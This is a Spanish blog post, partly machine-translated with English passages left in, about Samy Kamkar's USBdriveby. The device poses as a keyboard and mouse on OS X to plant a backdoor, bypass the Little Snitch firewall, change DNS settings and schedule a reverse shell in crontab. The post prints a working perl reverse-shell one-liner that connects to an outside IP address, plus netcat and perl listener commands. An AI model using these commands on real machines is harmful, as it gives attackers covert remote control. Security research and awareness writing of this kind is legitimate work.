Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Vídeo demostración de BadUSB con USBdriveby en Mac OS X


Samy Kamkar es el autor de una pequeña pieza de hardware llamada USBDriveBy que sirve para tomar el control de cualquier equipo OSX siempre y cuando no esté protegido por contraseña. El dispositivo es una sencilla placa controladora unida a un puerto USB.





Basta conectar la USBDribeBy a un equipo para que se identifique como un teclado y un ratón convencionales, abra la aplicación Terminal, instale una puerta trasera en Chrome, configure apropiadamente los ajustes de red, recoja sus cosas y deje todo como estaba. El proceso es completamente automático y apenas dura un minuto en el que el ordenador, eso sí, parece poseído por el mismísimo Satán.

El resultado es que todo el tráfico del equipo se redirige al ordenador del asaltante, que puede espiar lo que quiera o tomar el control del equipo hackeado en el momento en el que lo considere necesario.

Algunos de los cambios en la configuración se resisten a realizarse solo desde un teclado, pero Kamkar ha encontrado maneras de sortear esos obstáculos mediante movimientos ciegos de ratón. Aunque este hacker ha realizado la prueba en un Mac, asegura que es perfectamente aplicable a Windows y Linux.

Evidentemente, el hack no es tan temible si protegemos nuestro equipo mediante una contraseña de entrada, pero los ciberdelincuentes no suelen ser amistosos hackers con un USB al cuello que muestran sus progresos en YouTube. Si Samy ha logrado hacer esto, seguramente otros hayan dado con formas peores de aprovechar el USB. La propia BadUSB es más peligrosa por la cantidad de malware que permite inocular. [Samy Kamkar vía Hacker News]

En este proyecto, vamos a aprender cómo explotar la confianza ciega de un sistema en dispositivos USB, y aprender cómo un microcontrolador Teensy $ 20 puede evadir varios ajustes de seguridad en un sistema real, abre una puerta trasera permanente, desactivar un servidor de seguridad, controlar el flujo de la red tráfico, y todo dentro de un par de segundos y de forma permanente, incluso después de que el dispositivo ha sido eliminado.


En concreto, cuando se conecta normalmente en un ratón o un teclado en una máquina, no se requiere autorización para empezar a usarlos. Los dispositivos pueden simplemente comenzar a escribir y hacer clic. Aprovechamos este hecho mediante el envío de pulsaciones de teclas arbitrarios significan para lanzar aplicaciones específicas (a través de Spotlight / Alfred / Quicksilver), evadir permanentemente un firewall local (Little Snitch), instale un shell inversa en crontab, e incluso modificar la configuración DNS sin permisos adicionales.

Aunque este ejemplo es el OS X, es fácilmente extensible para Windows y * nix.

Incluso nos evadimos de seguridad de OS X - mientras tratan de evitar cambios en la red están realizando con sólo un "teclado", e incluso prevenir la mayoría de las aplicaciones de cambiar de posición (características especiales de accesibilidad autorizados deben estar habilitadas que no tenemos permiso para), que evadir ambas cosas con un poco de applescript sin protección y los movimientos del ratón cuidadosamente planificadas. Mientras que un dispositivo como Rubber Ducky es similar, es incapaz de montar los mismos ataques, ya que carece de HID Ratón emulación.


Software necesario



I've written it for both Teensy and Arduino microcontrollers, however not all Arduinos are capable of emulating a USB HID keyboard/mouse (the Arduino Nano specifically cannot).

  • dns_spoofer.pl

I've created a DNS server which responds to normal DNS requests properly, however sends spoofed answers for specific hostnames. This runs on a remote host and allows us to manipulate the traffic of the system that's been hit by USBdriveby.

This is also available on my github: https://github.com/samyk/usbdriveby

  • Net::DNS

My DNS spoofer depends on the Net::DNS suite of perl modules.
perl backdoor

We use a perl backdoor I developed as virtually all OS X and *nix machines have perl installed by default. You'll find many of these systems don't come with a C compiler, especially in the bare bones version, but perl is always quietly available.

perl -MIO::Socket -e'$c=new IO::Socket::INET("72.14.179.47:1337");print$c `$_`while<$c>'
  • netcat

To evade the local router and not require any ports opening up, we produce a reverse shell by connecting out to a server we control every 5 minutes via crontab, and once the connection is established, we can begin sending commands to the compromised machine. If the connection dies, the compromised system will connect back within 5 minutes. netcat is an easy way to support this.

netcat -l 1337

You could also use perl in lieu of netcat again:

perl -MIO -e'$c=new IO::Socket::INET(LocalPort,1337,Listen)->accept;print$c $_ while '

Fuente:
http://es.gizmodo.com/este-aterrador-video-muestra-lo-facil-que-es-hackear-un-1672786120

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.